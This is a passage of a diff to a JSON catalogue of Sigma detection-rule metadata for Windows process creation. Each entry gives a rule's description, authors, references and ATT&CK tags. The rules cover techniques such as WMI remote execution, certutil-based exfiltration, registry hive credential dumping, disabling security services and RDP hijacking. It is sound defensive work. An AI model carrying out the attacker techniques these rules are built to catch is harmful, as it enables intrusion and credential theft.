"931b6802-d6a6-4267-9ffa-526f57f22aaf", - "value": "Windows 10 Scheduled Task SandboxEscaper 0-day" - }, - { - "description": "Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/25", - "falsepositive": [ - "Other legitimate \"Windows Terminal\" profiles" - ], - "filename": "proc_creation_win_windows_terminal_susp_children.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://persistence-info.github.io/Data/windowsterminalprofile.html", - "https://twitter.com/nas_bench/status/1550836225652686848", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml" - ], - "tags": [ - "attack.execution", - "attack.persistence" - ] - }, - "uuid": "8de89e52-f6e1-4b5b-afd1-41ecfa300d48", - "value": "Suspicious WindowsTerminal Child Processes" - }, - { - "description": "WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. 
The checks are explained on book.hacktricks.xyz", - "meta": { - "author": "Georg Lauenstein", - "creation_date": "2022/09/19", - "falsepositive": [ - "Other programs that use the same command line flags" - ], - "filename": "proc_creation_win_winpeas_tool.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/carlospolop/PEASS-ng", - "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1082", - "attack.t1087", - "attack.t1046" - ] - }, - "uuid": "98b53e78-ebaf-46f8-be06-421aafd176d9", - "value": "Detect Execution of winPEAS" - }, - { - "description": "Detects the Installation of a Exchange Transport Agent", - "meta": { - "author": "Tobias Michalski", - "creation_date": "2021/06/08", - "falsepositive": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." 
- ], - "filename": "proc_creation_win_win_exchange_transportagent.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/blueteamsec1/status/1401290874202382336?s=20", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_win_exchange_transportagent.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.002" - ] - }, - "uuid": "83809e84-4475-4b69-bc3e-4aad8568612f", - "value": "MSExchange Transport Agent Installation" - }, - { - "description": "Detects execution of wmic utility with the \"computersystem\" flag in order to obtain information about the machine such as the domain, username, model...etc.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/08", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_wmic_computersystem_recon.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_computersystem_recon.yml" - ], - "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1047" - ] - }, - "uuid": "9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f", - "value": "Suspicious Get ComputerSystem Information with WMIC" - }, - { - "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/12", - "falsepositive": [ - "Unknown" - ], - 
"filename": "proc_creation_win_wmic_group_recon.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_group_recon.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.001" - ] - }, - "uuid": "164eda96-11b2-430b-85ff-6a265c15bf32", - "value": "Suspicious Get Local Groups Information with WMIC" - }, - { - "description": "Detects wmic known recon method to look for installed hotfixes, often used by pentest and attackers enum scripts", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/20", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_wmic_hotfix_enum.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", - "https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_hotfix_enum.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ] - }, - "uuid": "dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45", - "value": "WMIC Hotfix Recon" + "uuid": "1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd", + "value": "Suspicious Rundll32 Invoking Inline VBScript" }, { "description": "An adversary might use WMI to list Processes running on the compromised host or list installed Software hotfix and patches.", 
@@ -57700,429 +50976,733 @@ ] }, "uuid": "221b251a-357a-49a9-920a-271802777cc0", - "value": "Suspicious WMI Reconnaissance" + "value": "WMI Process Reconnaissance" }, { - "description": "An adversary might use WMI to execute commands on a remote system", + "description": "Detect use of Ilasm.exe to compile c# code into dll or exe.", "meta": { "author": "frack113", - "creation_date": "2022/03/13", + "creation_date": "2022/05/07", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_wmic_remote_command.yml", + "filename": "proc_creation_win_lolbin_ilasm.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_command.yml" + "https://www.echotrail.io/insights/search/ilasm.exe", + "https://lolbas-project.github.io/lolbas/Binaries/Ilasm/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "850d55f9-6eeb-4492-ad69-a72338f65ba4", + "value": "Ilasm Lolbin Use Compile C-Sharp" + }, + { + "description": "Detects execution of \"git\" in order to clone a remote repository that contain suspicious keywords which might be suspicious", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_git_clone.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_git_clone.yml" + ], + "tags": [ + "attack.reconnaissance", + "attack.t1593.003" + ] + }, + "uuid": "aef9d1f1-7396-4e92-a927-4567c7a495c1", + "value": "Suspicious Git Clone" + }, + { + "description": "Detects shell32.dll executing a DLL in a suspicious directory", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/11/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_target_location_shell32.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.group-ib.com/resources/threat-research/red-curl-2.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011" + ] + }, + "uuid": "32b96012-7892-429e-b26c-ac2bf46066ff", + "value": "Shell32 DLL Execution in Suspicious Directory" + }, + { + "description": "Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads", + "meta": { + "author": "frack113", + "creation_date": "2022/04/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_msiexec_embedding.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_embedding.yml" + ], + "tags": [ + "attack.t1218.007", + "attack.defense_evasion" + ] + }, + "uuid": "4a2a2c3e-209f-4d01-b513-4155a540b469", + "value": "Suspicious MsiExec Embedding Parent" + }, + { + "description": "Detects a suspicious child process of userinit", + "meta": { + "author": "Florian Roth (rule), Samir 
Bousseaden (idea)", + "creation_date": "2019/06/17", + "falsepositive": [ + "Administrative scripts" + ], + "filename": "proc_creation_win_susp_userinit_child.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1139811587760562176", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055" + ] + }, + "uuid": "b655a06a-31c0-477a-95c2-3726b83d649d", + "value": "Suspicious Userinit Child Process" + }, + { + "description": "Detects RDP Session Hijacking on Windows systems", + "meta": { + "author": "@juju4", + "creation_date": "2022/12/27", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_rdp_session_hijacking.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Moti_B/status/909449115477659651", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rdp_session_hijacking.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "224f140f-3553-4cd1-af78-13d81bf9f7cc", + "value": "Potential RDP Session Hijacking Activity" + }, + { + "description": "Detects suspicious Plink tunnel port forwarding to a local port", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/01/19", + "falsepositive": [ + "Administrative activity using a remote port forwarding to a local port" + ], + "filename": "proc_creation_win_susp_plink_port_forward.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d", + "https://www.real-sec.com/2019/04/bypassing-network-restrictions-through-rdp-tunneling/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_plink_port_forward.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001" + ] + }, + "uuid": "48a61b29-389f-4032-b317-b30de6b95314", + "value": "Suspicious Plink Port Forwarding" + }, + { + "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", + "meta": { + "author": "Florian Roth, John Lambert (idea), elhoim", + "creation_date": "2021/07/14", + "falsepositive": [ + "Unknown", + "Other security solution installers" + ], + "filename": "proc_creation_win_susp_reg_disable_sec_services.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1", + "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", + "https://twitter.com/JohnLaTwC/status/1415295021041979392", + "https://vms.drweb.fr/virus/?i=24144899", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_disable_sec_services.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "5e95028c-5229-4214-afae-d653d573d0ec", + "value": "Reg Disable Security Service" + }, + { + "description": "Detects suspicious a certutil command that used to encode files, which is sometimes used for data exfiltration", + "meta": { + "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2019/02/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_certutil_encode.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", + 
"https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_certutil_encode.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a", + "value": "Certutil Encode" + }, + { + "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/14", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_mshtml_runhtmlapplication.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/n1nj4sec/status/1421190238081277959", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshtml_runhtmlapplication.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", + "value": "Mshtml DLL RunHTMLApplication Abuse" + }, + { + "description": "Detects Too long PowerShell command lines", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_long_powershell_commandline.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_long_powershell_commandline.yml" ], "tags": [ "attack.execution", - "attack.t1047" + "attack.t1059.001" ] }, - "uuid": "e42af9df-d90b-4306-b7fb-05c863847ebd", - "value": "WMI Remote Command Execution" + "uuid": 
"d0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6", + "value": "Too Long PowerShell Commandlines" }, { - "description": "An adversary might use WMI to check if a certain Remote Service is running on a remote device.\nWhen the test completes, a service information will be displayed on the screen if it exists.\nA common feedback message is that \"No instance(s) Available\" if the service queried is not running.\nA common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if the provided remote host is unreachable\n", + "description": "Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_remote_file_download_desktopimgdownldr.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/remote-file-download-via-desktopimgdownldr-utility.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_file_download_desktopimgdownldr.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "214641c2-c579-4ecb-8427-0cf19df6842e", + "value": "Remote File Download via Desktopimgdownldr Utility" + }, + { + "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", + "meta": { + "author": "Max Altgelt", + "creation_date": "2021/12/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_non_exe_image.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://pentestlaboratories.com/2021/12/08/process-ghosting/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "c09dad97-1c78-4f71-b127-7edb2b8e491a", + "value": "Execution of Suspicious File Type Extension" + }, + { + "description": "Detects Credential Acquisition via Registry Hive Dumping", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/10/04", + "falsepositive": "No established falsepositives", + "filename": "proc_creation_win_credential_acquisition_registry_hive_dumping.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/credential-acquisition-via-registry-hive-dumping.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_credential_acquisition_registry_hive_dumping.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ] + }, + "uuid": "4d6c9da1-318b-4edf-bcea-b6c93fa98fd0", + "value": "Credential Acquisition via Registry Hive Dumping" + }, + { + "description": "Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter", + "meta": { + "author": "bohops", + "creation_date": "2022/10/30", + "falsepositive": [ + "False positives depend on custom use of vsls-agent.exe" + ], + "filename": "proc_creation_win_susp_vslsagent_agentextensionpath_load.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/bohops/status/1583916360404729857", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vslsagent_agentextensionpath_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": 
"43103702-5886-11ed-9b6a-0242ac120002", + "value": "Suspicious Vsls-Agent Command With AgentExtensionPath Load" + }, + { + "description": "Detects WMI SquiblyTwo Attack with possible renamed WMI by looking for imphash", + "meta": { + "author": "Markus Neis, Florian Roth", + "creation_date": "2019/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_bypass_squiblytwo.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mattifestation/status/986280382042595328", + "https://subt0x11.blogspot.ch/2018/04/wmicexe-whitelisting-bypass-hacking.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bypass_squiblytwo.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1047", + "attack.t1220", + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ] + }, + "uuid": "8d63dadf-b91b-4187-87b6-34a1114577ea", + "value": "SquiblyTwo Execution" + }, + { + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "meta": { + "author": "frack113", + "creation_date": "2021/07/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_automated_collection.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_automated_collection.yml" + ], + "tags": [ + "attack.collection", + "attack.t1119", + "attack.credential_access", + "attack.t1552.001" + ] + }, + "uuid": "f576a613-2392-4067-9d1a-9345fb58d8d1", + "value": 
"Automated Collection Command Prompt" + }, + { + "description": "Detect use of DirLister.exe", + "meta": { + "author": "frack113", + "creation_date": "2022/08/20", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_dirlister.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1083/T1083.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dirlister.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ] + }, + "uuid": "b4dc61f5-6cce-468e-a608-b48b469feaa2", + "value": "Launch DirLister Executable" + }, + { + "description": "Use of the commandline to shutdown or reboot windows", "meta": { "author": "frack113", "creation_date": "2022/01/01", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_wmic_remote_service.yml", + "filename": "proc_creation_win_susp_shutdown.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_service.yml" + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shutdown.yml" ], "tags": [ - "attack.execution", - "attack.t1047" + "attack.impact", + "attack.t1529" ] }, - "uuid": "09af397b-c5eb-4811-b2bb-08b3de464ebf", - "value": "WMI Reconnaissance List Remote 
Services" + "uuid": "34ebb878-1b15-4895-b352-ca2eeb99b274", + "value": "Suspicious Execution of Shutdown" }, { - "description": "Uninstall an application with wmic", - "meta": { - "author": "frac113", - "creation_date": "2022/01/28", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_wmic_remove_application.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-10---application-uninstall-using-wmic", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remove_application.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ] - }, - "uuid": "b53317a0-8acf-4fd1-8de8-a5401e776b96", - "value": "WMI Uninstall An Application" - }, - { - "description": "Detects usage of wmic to start or stop a service", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/20", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_wmic_service.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_service.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ] - }, - "uuid": "0b7163dc-7eee-4960-af17-c0cd517f92da", - "value": "WMIC Service Start/Stop" - }, - { - "description": "Detects wmic known recon method to look for unquoted service paths, often used by pentest and attackers enum scripts", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/20", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_wmic_unquoted_service_search.yml", - "level": "medium", - 
"logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", - "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1", - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_unquoted_service_search.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ] - }, - "uuid": "68bcd73b-37ef-49cb-95fc-edc809730be6", - "value": "WMIC Unquoted Services Path Lookup" - }, - { - "description": "Detects wmiprvse spawning processes", - "meta": { - "author": "Roberto Rodriguez @Cyb3rWard0g", - "creation_date": "2019/08/15", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_wmiprvse_spawning_process.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190810201010.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmiprvse_spawning_process.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ] - }, - "uuid": "d21374ff-f574-44a7-9998-4a8c8bf33d7d", - "value": "Wmiprvse Spawning Process" - }, - { - "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", + "description": "Detects a suspicious program execution in Outlook temp folder", "meta": { "author": "Florian Roth", - "creation_date": "2019/10/11", + "creation_date": "2019/10/01", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml", - "level": "critical", + "filename": "proc_creation_win_susp_outlook_temp.yml", + "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": 
[ - "https://twitter.com/cglyer/status/1182389676876980224", - "https://twitter.com/cglyer/status/1182391019633029120", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_outlook_temp.yml" ], "tags": [ - "attack.persistence", - "attack.t1546.003" + "attack.initial_access", + "attack.t1566.001" ] }, - "uuid": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", - "value": "WMI Backdoor Exchange Transport Agent" + "uuid": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", + "value": "Execution in Outlook Temp Folder" }, { - "description": "Detects WMI script event consumers", + "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", "meta": { - "author": "Thomas Patzke", - "creation_date": "2018/03/07", + "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", + "creation_date": "2019/11/15", "falsepositive": [ - "Legitimate event consumers", - "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" + "Unknown" ], - "filename": "proc_creation_win_wmi_persistence_script_event_consumer.yml", - "level": "medium", + "filename": "proc_creation_win_exploit_cve_2019_1378.yml", + "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml" + "https://www.embercybersecurity.com/blog/cve-2019-1378-exploiting-an-access-control-privilege-escalation-vulnerability-in-windows-10-update-assistant-wua", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1378.yml" ], "tags": [ - "attack.persistence", "attack.privilege_escalation", - "attack.t1546.003" + "attack.t1068", + "attack.execution", + "attack.t1059.003", + "attack.t1574", + "cve.2019.1378" ] }, - "uuid": "ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e", - "value": "WMI Persistence - Script Event Consumer" + "uuid": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", + "value": "Exploiting SetupComplete.cmd CVE-2019-1378" }, { - "description": "Detects WMI spawning a PowerShell process", + "description": "Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces\nAdversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe\n", "meta": { - "author": "Markus Neis / @Karneades", - "creation_date": "2019/04/03", + "author": "Agro (@agro_sev) oscd.community", + "creation_date": "2020/10/13", "falsepositive": [ - "AppvClient", - "CCM" + "It's not an uncommon to use te.exe directly to execute legal TAEF tests" ], - "filename": "proc_creation_win_wmi_spwns_powershell.yml", - "level": "high", + "filename": "proc_creation_win_susp_use_of_te_bin.yml", + "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://any.run/report/68bc255f9b0db6a0d30a8f2dadfbee3256acfe12497bf93943bc1eab0735e45e/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_spwns_powershell.yml" + "https://docs.microsoft.com/en-us/windows-hardware/drivers/taef/", + "https://twitter.com/pabraeken/status/993298228840992768", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml" ], "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1059.001" - ] - }, - "uuid": "692f0bec-83ba-4d04-af7e-e884a96059b6", - "value": "WMI Spawning Windows PowerShell" - }, - { - "description": "Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.", - "meta": { - "author": "Nik Seetharaman, frack113", - "creation_date": "2019/01/16", - "falsepositive": [ - "Legitimate MWC use (unlikely in modern enterprise environments)" - ], - "filename": "proc_creation_win_workflow_compiler.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_workflow_compiler.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1127", "attack.t1218" ] }, - "uuid": "419dbf2b-8a9b-4bea-bf99-7544b050ec8d", - "value": "Microsoft Workflow Compiler" + "uuid": "634b00d5-ccc3-4a06-ae3b-0ec8444dd51b", + "value": "Malicious Windows Script Components File Execution by TAEF Detection" }, { - "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", + "description": "Detects 